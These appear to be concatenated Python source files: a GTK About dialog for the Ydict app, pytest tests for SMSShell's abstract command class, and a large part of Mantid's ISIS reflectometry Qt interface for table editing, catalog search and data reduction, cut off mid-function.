# encoding=utf-8 from gi.repository import Gtk from .i18n import _ class AboutDialog(Gtk.AboutDialog): def __init__(self, parent): super(AboutDialog, self).__init__(title=_('About'), parent=parent) self.set_modal(True) self.set_program_name('Ydict') self.set_authors(['Wiky L<wiiiky@outlook.com>']) self.set_artists(['Wiky L<wiiiky@outlook.com>']) self.set_comments('') self.set_copyright('Copyright (c) Wiky L 2015') self.set_license_type(Gtk.License.GPL_3_0) self.set_logo_icon_name('ydict') self.set_version('1.0') self.set_website('https://github.com/wiiiky/ydict') self.set_website_label('GitHub') self.set_wrap_license(True)
Turgon37/SMSShell
tests/test_smsshell_commands.py
# -*- coding: utf8 -*- import argparse import logging import pytest import SMSShell import SMSShell.commands def test_abstract_init(): """Test abstract init methods """ abs = SMSShell.commands.AbstractCommand(logging.getLogger(), object(), object(), object()) assert abs.name == 'abstractcommand' def test_abstract_not_implemented(): abs = SMSShell.commands.AbstractCommand(logging.getLogger(), object(), object(), object()) with pytest.raises(SMSShell.commands.CommandBadImplemented): abs.description([]) with pytest.raises(SMSShell.commands.CommandBadImplemented): abs.usage([]) with pytest.raises(SMSShell.commands.CommandBadImplemented): abs.main([]) def test_abstract_bad_input_state_type(): class Bad(SMSShell.commands.AbstractCommand): def inputStates(self): return dict() com = Bad(logging.getLogger(), object(), object(), object()) with pytest.raises(SMSShell.commands.CommandBadImplemented): com._inputStates() def test_abstract_bad_input_state_value(): class Bad(SMSShell.commands.AbstractCommand): def inputStates(self): return ['d'] com = Bad(logging.getLogger(), object(), object(), object()) with pytest.raises(SMSShell.commands.CommandBadImplemented): com._inputStates() def test_abstract_bad_arg_parser_type(): class Bad(SMSShell.commands.AbstractCommand): def argsParser(self): return 'a' com = Bad(logging.getLogger(), object(), object(), object()) with pytest.raises(SMSShell.commands.CommandBadImplemented): com._argsParser() def test_abstract_bad_arg_parser_init(): class Bad(SMSShell.commands.AbstractCommand): def argsParser(self): raise ValueError('no') com = Bad(logging.getLogger(), object(), object(), object()) with pytest.raises(SMSShell.commands.CommandBadImplemented): com._argsParser()
dymkowsk/mantid
scripts/Interface/ui/reflectometer/refl_gui.py
# pylint: disable = too-many-lines, invalid-name, line-too-long, too-many-instance-attributes, # pylint: disable = too-many-branches,too-many-locals, too-many-nested-blocks from __future__ import (absolute_import, division, print_function) try: from mantidplot import * except ImportError: canMantidPlot = False # import csv import os import re from operator import itemgetter import itertools from PyQt4 import QtCore, QtGui from mantid.simpleapi import * from isis_reflectometry.quick import * from isis_reflectometry.convert_to_wavelength import ConvertToWavelength from isis_reflectometry import load_live_runs from isis_reflectometry.combineMulti import * import mantidqtpython from mantid.api import Workspace, WorkspaceGroup, CatalogManager, AlgorithmManager from mantid import UsageService from ui.reflectometer.ui_refl_window import Ui_windowRefl from ui.reflectometer.refl_save import Ui_SaveWindow from ui.reflectometer.refl_choose_col import ReflChoose from ui.reflectometer.refl_options import ReflOptions try: _fromUtf8 = QtCore.QString.fromUtf8 except AttributeError: def _fromUtf8(s): return s canMantidPlot = True class ReflGui(QtGui.QMainWindow, Ui_windowRefl): current_instrument = None current_table = None current_polarisation_method = None labelStatus = None accMethod = None def __init__(self): """ Initialise the interface """ super(QtGui.QMainWindow, self).__init__() self.setupUi(self) self.loading = False self.clip = QtGui.QApplication.clipboard() self.shown_cols = {} self.mod_flag = False self.run_cols = [0, 5, 10] self.angle_cols = [1, 6, 11] self.scale_col = 16 self.stitch_col = 17 self.plot_col = 18 self.__graphs = dict() self._last_trans = "" self.icat_file_map = None self.__instrumentRuns = None self.__icat_download = False self.__group_tof_workspaces = True # Q Settings self.__generic_settings = "Mantid/ISISReflGui" self.__live_data_settings = "Mantid/ISISReflGui/LiveData" self.__search_settings = "Mantid/ISISReflGui/Search" self.__column_settings = "Mantid/ISISReflGui/Columns" self.__icat_download_key = "icat_download" self.__ads_use_key = "AlgUse" self.__alg_migration_key = "AlgUseReset" self.__live_data_frequency_key = "frequency" self.__live_data_method_key = "method" self.__group_tof_workspaces_key = "group_tof_workspaces" self.__stitch_right_key = "stitch_right" # Setup instrument with defaults assigned. self.instrument_list = ['INTER', 'SURF', 'CRISP', 'POLREF', 'OFFSPEC'] self.polarisation_instruments = ['CRISP', 'POLREF'] self.polarisation_options = {'None': PolarisationCorrection.NONE, '1-PNR': PolarisationCorrection.PNR, '2-PA': PolarisationCorrection.PA} # Set the live data settings, use default if none have been set before settings = QtCore.QSettings() settings.beginGroup(self.__live_data_settings) self.live_method = settings.value(self.__live_data_method_key, "", type=str) self.live_freq = settings.value(self.__live_data_frequency_key, 0, type=float) if not self.live_freq: logger.information( "No settings were found for Update frequency of loading live data, Loading default of 60 seconds") self.live_freq = float(60) settings.setValue(self.__live_data_frequency_key, self.live_freq) if not self.live_method: logger.information( "No settings were found for Accumulation Method of loading live data, Loading default of \"Add\"") self.live_method = "Add" settings.setValue(self.__live_data_method_key, self.live_method) settings.endGroup() settings.beginGroup(self.__generic_settings) self.__alg_migrate = settings.value(self.__alg_migration_key, True, type=bool) if self.__alg_migrate: self.__alg_use = True # We will use the algorithms by default rather than the quick scripts self.__alg_migrate = False # Never do this again. We only want to reset once. else: self.__alg_use = settings.value(self.__ads_use_key, True, type=bool) self.__icat_download = settings.value(self.__icat_download_key, False, type=bool) self.__group_tof_workspaces = settings.value(self.__group_tof_workspaces_key, True, type=bool) self.__scale_right = settings.value(self.__stitch_right_key, True, type=bool) settings.setValue(self.__ads_use_key, self.__alg_use) settings.setValue(self.__icat_download_key, self.__icat_download) settings.setValue(self.__group_tof_workspaces_key, self.__group_tof_workspaces) settings.setValue(self.__alg_migration_key, self.__alg_migrate) settings.setValue(self.__stitch_right_key, self.__scale_right) settings.endGroup() del settings # register startup UsageService.registerFeatureUsage("Interface", "ISIS Reflectomety", False) def __del__(self): """ Save the contents of the table if the modified flag was still set """ if self.mod_flag: self._save(true) def _save_check(self): """ Show a custom message box asking if the user wants to save, or discard their changes or cancel back to the interface """ msgBox = QtGui.QMessageBox() msgBox.setText("The table has been modified. Do you want to save your changes?") accept_btn = QtGui.QPushButton('Save') cancel_btn = QtGui.QPushButton('Cancel') discard_btn = QtGui.QPushButton('Discard') msgBox.addButton(accept_btn, QtGui.QMessageBox.AcceptRole) msgBox.addButton(cancel_btn, QtGui.QMessageBox.RejectRole) msgBox.addButton(discard_btn, QtGui.QMessageBox.NoRole) msgBox.setIcon(QtGui.QMessageBox.Question) msgBox.setDefaultButton(accept_btn) msgBox.setEscapeButton(cancel_btn) msgBox.exec_() btn = msgBox.clickedButton() saved = None if btn.text() == accept_btn.text(): ret = QtGui.QMessageBox.AcceptRole saved = self._save() elif btn.text() == cancel_btn.text(): ret = QtGui.QMessageBox.RejectRole else: ret = QtGui.QMessageBox.NoRole return ret, saved def closeEvent(self, event): """ Close the window. but check if the user wants to save """ self.buttonProcess.setFocus() if self.mod_flag: event.ignore() ret, saved = self._save_check() if ret == QtGui.QMessageBox.AcceptRole: if saved: self.mod_flag = False event.accept() elif ret == QtGui.QMessageBox.RejectRole: event.ignore() elif ret == QtGui.QMessageBox.NoRole: self.mod_flag = False event.accept() def _instrument_selected(self, instrument): """ Change the default instrument to the selected one """ config['default.instrument'] = self.instrument_list[instrument] logger.notice("Instrument is now: " + str(config['default.instrument'])) self.textRB.clear() self._populate_runs_list() self.current_instrument = self.instrument_list[instrument] self.comboPolarCorrect.setEnabled( self.current_instrument in self.polarisation_instruments) # Enable as appropriate self.comboPolarCorrect.setCurrentIndex(self.comboPolarCorrect.findText('None')) # Reset to None def _table_modified(self, row, column): """ sets the modified flag when the table is altered """ # Sometimes users enter leading or trailing whitespace into a cell. # Let's remove it for them automatically. item = self.tableMain.item(row, column) item.setData(0, str.strip(str(item.data(0)))) if not self.loading: self.mod_flag = True plotbutton = self.tableMain.cellWidget(row, self.plot_col).children()[1] self.__reset_plot_button(plotbutton) def _plot_row(self): """ handler for the plot buttons """ plotbutton = self.sender() self._plot(plotbutton) def _show_slit_calculator(self): calc = mantidqtpython.MantidQt.MantidWidgets.SlitCalculator(self) calc.setCurrentInstrumentName(self.current_instrument) calc.processInstrumentHasBeenChanged() calc.exec_() def _polar_corr_selected(self): """ Event handler for polarisation correction selection. """ if self.current_instrument in self.polarisation_instruments: chosen_method = self.comboPolarCorrect.currentText() self.current_polarisation_method = self.polarisation_options[chosen_method] else: logger.notice("Polarisation correction is not supported on " + str(self.current_instrument)) def setup_layout(self): """ Do further setup layout that couldn't be done in the designer """ self.comboInstrument.addItems(self.instrument_list) current_instrument = config['default.instrument'].upper() if current_instrument in self.instrument_list: self.comboInstrument.setCurrentIndex(self.instrument_list.index(current_instrument)) else: self.comboInstrument.setCurrentIndex(0) config['default.instrument'] = 'INTER' self.current_instrument = config['default.instrument'].upper() # Setup polarisation options with default assigned self.comboPolarCorrect.clear() self.comboPolarCorrect.addItems(list(self.polarisation_options.keys())) self.comboPolarCorrect.setCurrentIndex(self.comboPolarCorrect.findText('None')) self.current_polarisation_method = self.polarisation_options['None'] self.comboPolarCorrect.setEnabled(self.current_instrument in self.polarisation_instruments) self.splitterList.setSizes([200, 800]) self.labelStatus = QtGui.QLabel("Ready") self.statusMain.addWidget(self.labelStatus) self._initialise_table() self._populate_runs_list() self._connect_slots() return True def _reset_table(self): """ Reset the plot buttons and stitch checkboxes back to thier defualt state """ # switches from current to true, to false to make sure stateChanged fires self.checkTickAll.setCheckState(2) self.checkTickAll.setCheckState(0) for row in range(self.tableMain.rowCount()): plotbutton = self.tableMain.cellWidget(row, self.plot_col).children()[1] self.__reset_plot_button(plotbutton) def __reset_plot_button(self, plotbutton): """ Reset the provided plot button to ti's default state: disabled and with no cache """ plotbutton.setDisabled(True) plotbutton.setProperty('runno', None) plotbutton.setProperty('overlapLow', None) plotbutton.setProperty('overlapHigh', None) plotbutton.setProperty('wksp', None) def _initialise_table(self): """ Initialise the table. Clearing all data and adding the checkboxes and plot buttons """ # first check if the table has been changed before clearing it if self.mod_flag: ret, _saved = self._save_check() if ret == QtGui.QMessageBox.RejectRole: return self.current_table = None settings = QtCore.QSettings() settings.beginGroup(self.__column_settings) for column in range(self.tableMain.columnCount()): for row in range(self.tableMain.rowCount()): if column in self.run_cols: item = QtGui.QTableWidgetItem() item.setText('') item.setToolTip('Runs can be colon delimited to coadd them') self.tableMain.setItem(row, column, item) elif column in self.angle_cols: item = QtGui.QTableWidgetItem() item.setText('') item.setToolTip('Angles are in degrees') self.tableMain.setItem(row, column, item) elif column == self.stitch_col: check = QtGui.QCheckBox() check.setCheckState(False) check.setToolTip('If checked, the runs in this row will be stitched together') item = QtGui.QWidget() layout = QtGui.QHBoxLayout(item) layout.addWidget(check) layout.setAlignment(QtCore.Qt.AlignCenter) layout.setSpacing(0) layout.setContentsMargins(0, 0, 0, 0) item.setLayout(layout) item.setContentsMargins(0, 0, 0, 0) self.tableMain.setCellWidget(row, self.stitch_col, item) elif column == self.plot_col: button = QtGui.QPushButton('Plot') button.setProperty("row", row) self.__reset_plot_button(button) button.setToolTip('Plot the workspaces produced by processing this row.') button.clicked.connect(self._plot_row) item = QtGui.QWidget() layout = QtGui.QHBoxLayout(item) layout.addWidget(button) layout.setAlignment(QtCore.Qt.AlignCenter) layout.setSpacing(0) layout.setContentsMargins(0, 0, 0, 0) item.setLayout(layout) item.setContentsMargins(0, 0, 0, 0) self.tableMain.setCellWidget(row, self.plot_col, item) else: item = QtGui.QTableWidgetItem() item.setText('') self.tableMain.setItem(row, column, item) vis_state = settings.value(str(column), True, type=bool) self.shown_cols[column] = vis_state if vis_state: self.tableMain.showColumn(column) else: self.tableMain.hideColumn(column) settings.endGroup() del settings self.tableMain.resizeColumnsToContents() self.mod_flag = False def _connect_slots(self): """ Connect the signals to the corresponding methods """ self.checkTickAll.stateChanged.connect(self._set_all_stitch) self.comboInstrument.activated[int].connect(self._instrument_selected) self.comboPolarCorrect.activated.connect(self._polar_corr_selected) self.textRB.returnPressed.connect(self._populate_runs_list) self.buttonAuto.clicked.connect(self._autofill) self.buttonSearch.clicked.connect(self._populate_runs_list) self.buttonClear.clicked.connect(self._initialise_table) self.buttonProcess.clicked.connect(self._process) self.buttonTransfer.clicked.connect(self._transfer) self.buttonColumns.clicked.connect(self._choose_columns) self.actionOpen_Table.triggered.connect(self._load_table) self.actionReload_from_Disk.triggered.connect(self._reload_table) self.actionSave.triggered.connect(self._save) self.actionSave_As.triggered.connect(self._save_as) self.actionSave_Workspaces.triggered.connect(self._save_workspaces) self.actionClose_Refl_Gui.triggered.connect(self.close) self.actionMantid_Help.triggered.connect(self._show_help) self.actionAutofill.triggered.connect(self._autofill) self.actionSearch_RB.triggered.connect(self._populate_runs_list) self.actionClear_Table.triggered.connect(self._initialise_table) self.actionProcess.triggered.connect(self._process) self.actionTransfer.triggered.connect(self._transfer) self.tableMain.cellChanged.connect(self._table_modified) self.actionClear.triggered.connect(self._clear_cells) self.actionPaste.triggered.connect(self._paste_cells) self.actionCut.triggered.connect(self._cut_cells) self.actionCopy.triggered.connect(self._copy_cells) self.actionChoose_Columns.triggered.connect(self._choose_columns) self.actionRefl_Gui_Options.triggered.connect(self._options_dialog) self.actionSlit_Calculator.triggered.connect(self._show_slit_calculator) def __valid_rb(self): # Ensure that you cannot put zero in for an rb search rbSearchValidator = QtGui.QIntValidator(self) current_text = self.textRB.text() rbSearchValidator.setBottom(1) state = rbSearchValidator.validate(current_text, 0)[0] if state == QtGui.QValidator.Acceptable: return True else: self.textRB.clear() if current_text: logger.warning("RB search restricted to numbers > 0") return False def _populate_runs_list(self): """ Populate the list at the right with names of runs and workspaces from the archives """ # Clear existing self.listMain.clear() if self.__valid_rb(): # Use ICAT for a journal search based on the RB number active_session_id = None if CatalogManager.numberActiveSessions() == 0: # Execute the CatalogLoginDialog login_alg = CatalogLoginDialog() session_object = login_alg.getProperty("KeepAlive").value active_session_id = session_object.getPropertyValue("Session") # Fetch out an existing session id active_session_id = CatalogManager.getActiveSessions()[-1].getSessionId() # This might be another catalog session, but at present there is no way to tell. search_alg = AlgorithmManager.create('CatalogGetDataFiles') search_alg.initialize() search_alg.setChild(True) # Keeps the results table out of the ADS search_alg.setProperty('InvestigationId', str(self.textRB.text())) search_alg.setProperty('Session', active_session_id) search_alg.setPropertyValue('OutputWorkspace', '_dummy') search_alg.execute() search_results = search_alg.getProperty('OutputWorkspace').value self.icat_file_map = {} self.statusMain.clearMessage() for row in search_results: file_name = row['Name'] file_id = row['Id'] description = row['Description'] run_number = re.search(r'[1-9]\d+', file_name).group() if bool(re.search('(raw)$', file_name, re.IGNORECASE)): # Filter to only display and map raw files. title = (run_number + ': ' + description).strip() self.icat_file_map[title] = (file_id, run_number, file_name) self.listMain.addItem(title) self.listMain.sortItems() del search_results def _autofill(self): """ copy the contents of the selected cells to the row below as long as the row below contains a run number in the first cell """ # make sure all selected cells are in the same row sum = 0 howMany = len(self.tableMain.selectedItems()) for cell in self.tableMain.selectedItems(): sum = sum + self.tableMain.row(cell) if howMany: selectedrow = self.tableMain.row(self.tableMain.selectedItems()[0]) if sum / howMany == selectedrow: startrow = selectedrow + 1 filled = 0 for cell in self.tableMain.selectedItems(): row = startrow txt = cell.text() while self.tableMain.item(row, 0).text() != '': item = QtGui.QTableWidgetItem() item.setText(txt) self.tableMain.setItem(row, self.tableMain.column(cell), item) row = row + 1 filled = filled + 1 if not filled: QtGui.QMessageBox.critical(self.tableMain, 'Cannot perform Autofill', "No target cells to autofill. Rows to be filled should contain a run number in their " "first cell, and start from directly below the selected line.") else: QtGui.QMessageBox.critical(self.tableMain, 'Cannot perform Autofill', "Selected cells must all be in the same row.") else: QtGui.QMessageBox.critical(self.tableMain, 'Cannot perform Autofill', "There are no source cells selected.") def _clear_cells(self): """ Clear the selected area of data """ cells = self.tableMain.selectedItems() for cell in cells: column = cell.column() if column < self.stitch_col: cell.setText('') def _cut_cells(self): """ copy the selected cells then clear the area """ self._copy_cells() self._clear_cells() def _copy_cells(self): """ Copy the selected ranage of cells to the clipboard """ cells = self.tableMain.selectedItems() if not cells: print 'nothing to copy' return # first discover the size of the selection and initialise a list mincol = cells[0].column() if mincol > self.scale_col: logger.error("Cannot copy, all cells out of range") return maxrow = -1 maxcol = -1 minrow = cells[0].row() for cell in reversed(range(len(cells))): col = cells[cell].column() if col < self.stitch_col: maxcol = col maxrow = cells[cell].row() break colsize = maxcol - mincol + 1 rowsize = maxrow - minrow + 1 selection = [['' for x in range(colsize)] for y in range(rowsize)] # now fill that list for cell in cells: row = cell.row() col = cell.column() if col < self.stitch_col: selection[row - minrow][col - mincol] = str(cell.text()) tocopy = '' for y in range(rowsize): for x in range(colsize): if x > 0: tocopy += '\t' tocopy += selection[y][x] if y < (rowsize - 1): tocopy += '\n' self.clip.setText(str(tocopy)) def _paste_cells(self): """ Paste the contents of the clipboard to the table at the selected position """ pastedtext = self.clip.text() if not pastedtext: logger.warning("Nothing to Paste") return selected = self.tableMain.selectedItems() if not selected: logger.warning("Cannot paste, no editable cells selected") return pasted = pastedtext.splitlines() pastedcells = [] for row in pasted: pastedcells.append(row.split('\t')) pastedcols = len(pastedcells[0]) pastedrows = len(pastedcells) if len(selected) > 1: # discover the size of the selection mincol = selected[0].column() if mincol > self.scale_col: logger.error("Cannot copy, all cells out of range") return minrow = selected[0].row() # now fill that list for cell in selected: row = cell.row() col = cell.column() if col < self.stitch_col and (col - mincol) < pastedcols and (row - minrow) < pastedrows and len( pastedcells[row - minrow]): cell.setText(pastedcells[row - minrow][col - mincol]) elif selected: # when only a single cell is selected, paste all the copied item up until the table limits cell = selected[0] currow = cell.row() homecol = cell.column() tablerows = self.tableMain.rowCount() for row in pastedcells: if len(row): curcol = homecol if currow < tablerows: for col in row: if curcol < self.stitch_col: curcell = self.tableMain.item(currow, curcol) curcell.setText(col) curcol += 1 else: # the row has hit the end of the editable cells break currow += 1 else: # it's dropped off the bottom of the table break else: logger.warning("Cannot paste, no editable cells selected") def _transfer(self): """ Transfer run numbers to the table """ tup = () for idx in self.listMain.selectedItems(): split_title = re.split(":th=|th=|:|dq/q=", idx.text()) if len(split_title) < 3: split_title = re.split(":", idx.text()) if len(split_title) < 2: logger.warning('cannot transfer ' + idx.text() + ' title is not in the right form ') continue else: theta = 0 split_title.append(theta) # Append a dummy theta value. if len(split_title) < 4: dqq = 0 split_title.append(dqq) # Append a dummy dq/q value. tup = tup + (split_title,) # Tuple of lists containing (run number, title, theta, dq/q) tupsort = sorted(tup, key=itemgetter(1, 2)) # now sorted by title then theta row = 0 for _key, group in itertools.groupby(tupsort, lambda x: x[1]): # now group by title col = 0 dqq = 0 # only one value of dqq per row run_angle_pairs_of_title = list() # for storing run_angle pairs all with the same title for object in group: # loop over all with equal title run_no = object[0] dqq = object[-1] angle = object[-2] run_angle_pairs_of_title.append((run_no, angle)) for angle_key, group in itertools.groupby(run_angle_pairs_of_title, lambda x: x[1]): runnumbers = "+".join(["%s" % pair[0] for pair in group]) # set the runnumber item = QtGui.QTableWidgetItem() item.setText(str(runnumbers)) self.tableMain.setItem(row, col, item) # Set the angle item = QtGui.QTableWidgetItem() item.setText(str(angle_key)) self.tableMain.setItem(row, col + 1, item) # Set the transmission item = QtGui.QTableWidgetItem() item.setText(self.textRuns.text()) self.tableMain.setItem(row, col + 2, item) col = col + 5 if col >= 11: col = 0 # set dq/q item = QtGui.QTableWidgetItem() item.setText(str(dqq)) self.tableMain.setItem(row, 15, item) row = row + 1 if self.__icat_download: # If ICAT is being used for download, then files must be downloaded at the same time as they are transferred contents = str(idx.text()).strip() file_id, _runnumber, file_name = self.icat_file_map[contents] active_session_id = CatalogManager.getActiveSessions()[-1].getSessionId() # This might be another catalog session, but at present there is no way to tell. save_location = config['defaultsave.directory'] CatalogDownloadDataFiles(file_id, FileNames=file_name, DownloadPath=save_location, Session=active_session_id) current_search_dirs = config.getDataSearchDirs() if save_location not in current_search_dirs: config.appendDataSearchDir(save_location) def _set_all_stitch(self, state): """ Set the checkboxes in the Stitch? column to the same """ for row in range(self.tableMain.rowCount()): self.tableMain.cellWidget(row, self.stitch_col).children()[1].setCheckState(state) def __checked_row_stiched(self, row): return self.tableMain.cellWidget(row, self.stitch_col).children()[1].checkState() > 0 def _process(self): """ Process has been pressed, check what has been selected then pass the selection (or whole table) to quick """ # --------- If "Process" button pressed, convert raw files to IvsLam and IvsQ and combine if checkbox ticked ------------- _overallQMin = float("inf") _overallQMax = float("-inf") try: willProcess = True rows = self.tableMain.selectionModel().selectedRows() rowIndexes = [] for idx in rows: rowIndexes.append(idx.row()) if not len(rowIndexes): reply = QtGui.QMessageBox.question(self.tableMain, 'Process all rows?', "This will process all rows in the table. Continue?", QtGui.QMessageBox.Yes, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.No: logger.notice("Cancelled!") willProcess = False else: rowIndexes = range(self.tableMain.rowCount()) if willProcess: for row in rowIndexes: # range(self.tableMain.rowCount()): runno = [] wksp = [] overlapLow = [] overlapHigh = [] if self.tableMain.item(row, 0).text() != '': self.statusMain.showMessage("Processing row: " + str(row + 1)) logger.debug("Processing row: " + str(row + 1)) for i in range(3): run_entry = str(self.tableMain.item(row, i * 5).text()) if run_entry != '': runno.append(run_entry) ovLow = str(self.tableMain.item(row, (i * 5) + 3).text()) if ovLow != '': overlapLow.append(float(ovLow)) ovHigh = str(self.tableMain.item(row, (i * 5) + 4).text()) if ovHigh != '': overlapHigh.append(float(ovHigh)) # Determine resolution if self.tableMain.item(row, 15).text() == '': loadedRun = None if load_live_runs.is_live_run(runno[0]): loadedRun = load_live_runs.get_live_data(config['default.instrument'], frequency=self.live_freq, accumulation=self.live_method) else: Load(Filename=runno[0], OutputWorkspace="_run") loadedRun = mtd["_run"] theta_in_str = str(self.tableMain.item(row, 1).text()) try: theta_in = None if len(theta_in_str) > 0: theta_in = float(theta_in_str) # Make sure we only ever run calculate resolution on a non-group workspace. # If we're given a group workspace, we can just run it on the first member of the group instead thetaRun = loadedRun if isinstance(thetaRun, WorkspaceGroup): thetaRun = thetaRun[0] if not theta_in: theta_in = getLogValue(thetaRun, "Theta") dqq = NRCalculateSlitResolution(Workspace=thetaRun, TwoTheta=2*theta_in) # Put the calculated resolution into the table resItem = QtGui.QTableWidgetItem() resItem.setText(str(dqq)) self.tableMain.setItem(row, 15, resItem) # Update the value for theta_in in the table ttItem = QtGui.QTableWidgetItem() ttItem.setText(str(theta_in)) self.tableMain.setItem(row, 1, ttItem) logger.notice("Calculated resolution: " + str(dqq)) except: self.statusMain.clearMessage() logger.error( "Failed to calculate dq/q because we could not find theta in the workspace's sample log. " "Try entering theta or dq/q manually.") return else: dqq = float(self.tableMain.item(row, 15).text()) # Check secondary and tertiary theta_in columns, if they're # blank and their corresponding run columns are set, fill them. for run_col in [5, 10]: tht_col = run_col + 1 run_val = str(self.tableMain.item(row, run_col).text()) tht_val = str(self.tableMain.item(row, tht_col).text()) if run_val and not tht_val: Load(Filename=run_val, OutputWorkspace="_run") loadedRun = mtd["_run"] tht_val = getLogValue(loadedRun, "Theta") if tht_val: self.tableMain.item(row, tht_col).setText(str(tht_val)) # Populate runlist first_wq = None for i in range(0, len(runno)): theta, qmin, qmax, _wlam, wqBinnedAndScaled, _wqUnBinnedAndUnScaled = \ self._do_run(runno[i], row, i) if not first_wq: first_wq = wqBinnedAndScaled # Cache the first Q workspace theta = round(theta, 3) qmin = round(qmin, 3) qmax = round(qmax, 3) wksp.append(wqBinnedAndScaled.name()) if self.tableMain.item(row, i * 5 + 1).text() == '': item = QtGui.QTableWidgetItem() item.setText(str(theta)) self.tableMain.setItem(row, i * 5 + 1, item) if self.tableMain.item(row, i * 5 + 3).text() == '': item = QtGui.QTableWidgetItem() item.setText(str(qmin)) self.tableMain.setItem(row, i * 5 + 3, item) overlapLow.append(qmin) if self.tableMain.item(row, i * 5 + 4).text() == '': item = QtGui.QTableWidgetItem() item.setText(str(qmax)) self.tableMain.setItem(row, i * 5 + 4, item) overlapHigh.append(qmax) if wksp[i].find(',') > 0 or wksp[i].find(':') > 0: wksp[i] = first_wq.name() if self.__checked_row_stiched(row): if len(runno) == 1: logger.notice("Nothing to combine for processing row : " + str(row)) else: w1 = getWorkspace(wksp[0]) w2 = getWorkspace(wksp[-1]) if len(runno) == 2: outputwksp = runno[0] + '_' + runno[1][3:] else: outputwksp = runno[0] + '_' + runno[-1][3:] # get Qmax if self.tableMain.item(row, i * 5 + 4).text() == '': overlapHigh = 0.3 * max(w1.readX(0)) Qmin = min(w1.readX(0)) Qmax = max(w2.readX(0)) if len(self.tableMain.item(row, i * 5 + 3).text()) > 0: Qmin = float(self.tableMain.item(row, i * 5 + 3).text()) if len(self.tableMain.item(row, i * 5 + 4).text()) > 0: Qmax = float(self.tableMain.item(row, i * 5 + 4).text()) if Qmax > _overallQMax: _overallQMax = Qmax if Qmin < _overallQMin: _overallQMin = Qmin combineDataMulti(wksp, outputwksp, overlapLow, overlapHigh, _overallQMin, _overallQMax, -dqq, 1, keep=True, scale_right=self.__scale_right) # Enable the plot button plotbutton = self.tableMain.cellWidget(row, self.plot_col).children()[1] plotbutton.setProperty('runno', runno) plotbutton.setProperty('overlapLow', overlapLow) plotbutton.setProperty('overlapHigh', overlapHigh) plotbutton.setProperty('wksp', wksp) plotbutton.setEnabled(True) self.statusMain.clearMessage() self.accMethod = None self.statusMain.clearMessage() except: self.statusMain.clearMessage() raise def _plot(self, plotbutton): """ Plot the row belonging to the selected button """ if not isinstance(plotbutton, QtGui.QPushButton): logger.error("Problem accessing cached data: Wrong data type passed, expected QtGui.QPushbutton") return import unicodedata # make sure the required data can be retrieved properly try: runno_u = plotbutton.property('runno') runno = [] for uni in runno_u: runno.append(unicodedata.normalize('NFKD', uni).encode('ascii', 'ignore')) wksp_u = plotbutton.property('wksp') wksp = [] for uni in wksp_u: wksp.append(unicodedata.normalize('NFKD', uni).encode('ascii', 'ignore')) overlapLow = plotbutton.property('overlapLow') overlapHigh = plotbutton.property('overlapHigh') row = plotbutton.property('row') wkspBinned = [] w1 = getWorkspace(wksp[0]) w2 = getWorkspace(wksp[len(wksp) - 1]) dqq = float(self.tableMain.item(row, 15).text()) except: logger.error("Unable to plot row, required data couldn't be retrieved") self.__reset_plot_button(plotbutton) return for i in range(len(runno)): if len(overlapLow): Qmin = overlapLow[0] else: Qmin = min(w1.readX(0)) if len(overlapHigh): Qmax = overlapHigh[len(overlapHigh) - 1] else: Qmax = max(w2.readX(0)) ws_name_binned = wksp[i] wkspBinned.append(ws_name_binned) wsb = getWorkspace(ws_name_binned) _Imin = min(wsb.readY(0)) _Imax = max(wsb.readY(0)) if canMantidPlot: # Get the existing graph if it exists base_graph = self.__graphs.get(wksp[0], None) # Clear the window if we're the first of a new set of curves clearWindow = (i == 0) # Plot the new curve base_graph = plotSpectrum(ws_name_binned, 0, True, window=base_graph, clearWindow=clearWindow) # Save the graph so we can re-use it self.__graphs[wksp[i]] = base_graph titl = groupGet(ws_name_binned, 'samp', 'run_title') if isinstance(titl, str): base_graph.activeLayer().setTitle(titl) base_graph.activeLayer().setAxisScale(Layer.Left, _Imin * 0.1, _Imax * 10, Layer.Log10) base_graph.activeLayer().setAxisScale(Layer.Bottom, Qmin * 0.9, Qmax * 1.1, Layer.Log10) base_graph.activeLayer().setAutoScale() # Create and plot stitched outputs if self.__checked_row_stiched(row): if len(runno) == 2: outputwksp = runno[0] + '_' + runno[1][3:] else: outputwksp = runno[0] + '_' + runno[2][3:] if not getWorkspace(outputwksp, report_error=False): # Stitching has not been done as part of processing, so we need to do it here. combineDataMulti(wkspBinned, outputwksp, overlapLow, overlapHigh, Qmin, Qmax, -dqq, 1, keep=True, scale_right=self.__scale_right) Qmin = min(getWorkspace(outputwksp).readX(0)) Qmax = max(getWorkspace(outputwksp).readX(0)) if canMantidPlot: stitched_graph = self.__graphs.get(outputwksp, None) stitched_graph = plotSpectrum(outputwksp, 0, True, window=stitched_graph, clearWindow=True) titl = groupGet(outputwksp, 'samp', 'run_title') stitched_graph.activeLayer().setTitle(titl) stitched_graph.activeLayer().setAxisScale(Layer.Left, 1e-8, 100.0, Layer.Log10) stitched_graph.activeLayer().setAxisScale(Layer.Bottom, Qmin * 0.9, Qmax * 1.1, Layer.Log10) self.__graphs[outputwksp] = stitched_graph def __name_trans(self, transrun): """ From a comma or colon separated string of run numbers construct an output workspace name for the transmission workspace that fits the form TRANS_{trans_1}_{trans_2} """ if bool(re.search("^(TRANS)", transrun)): # The user has deliberately tried to supply the transmission run directly return transrun else: split_trans = re.split(',|:', transrun) if len(split_trans) == 0: return None name = 'TRANS' for t in split_trans: name += '_' + str(t) return name def _do_run(self, runno, row, which): """ Run quick on the given run and row """ transrun = str(self.tableMain.item(row, (which * 5) + 2).text()) # Formulate a WS Name for the processed transmission run. transrun_named = self.__name_trans(transrun) # Look for existing transmission workspaces that match the name transmission_ws = None if mtd.doesExist(transrun_named): if isinstance(mtd[transrun_named], WorkspaceGroup): unit = mtd[transrun_named][0].getAxis(0).getUnit().unitID() else: unit = mtd[transrun_named].getAxis(0).getUnit().unitID() if unit == "Wavelength": logger.notice('Reusing transmission workspace ' + transrun_named) transmission_ws = mtd[transrun_named] angle_str = str(self.tableMain.item(row, which * 5 + 1).text()) if len(angle_str) > 0: angle = float(angle_str) else: angle = None loadedRun = runno if load_live_runs.is_live_run(runno): load_live_runs.get_live_data(config['default.instrument'], frequency=self.live_freq, accumulation=self.live_method) wlam, wq, th, wqBinned = None, None, None, None # Only make a transmission workspace if we need one. if transrun and not transmission_ws: converter = ConvertToWavelength(transrun) size = converter.get_ws_list_size() out_ws_name = transrun_named if size == 1: trans1 = converter.get_workspace_from_list(0) transmission_ws = CreateTransmissionWorkspaceAuto(FirstTransmissionRun=trans1, 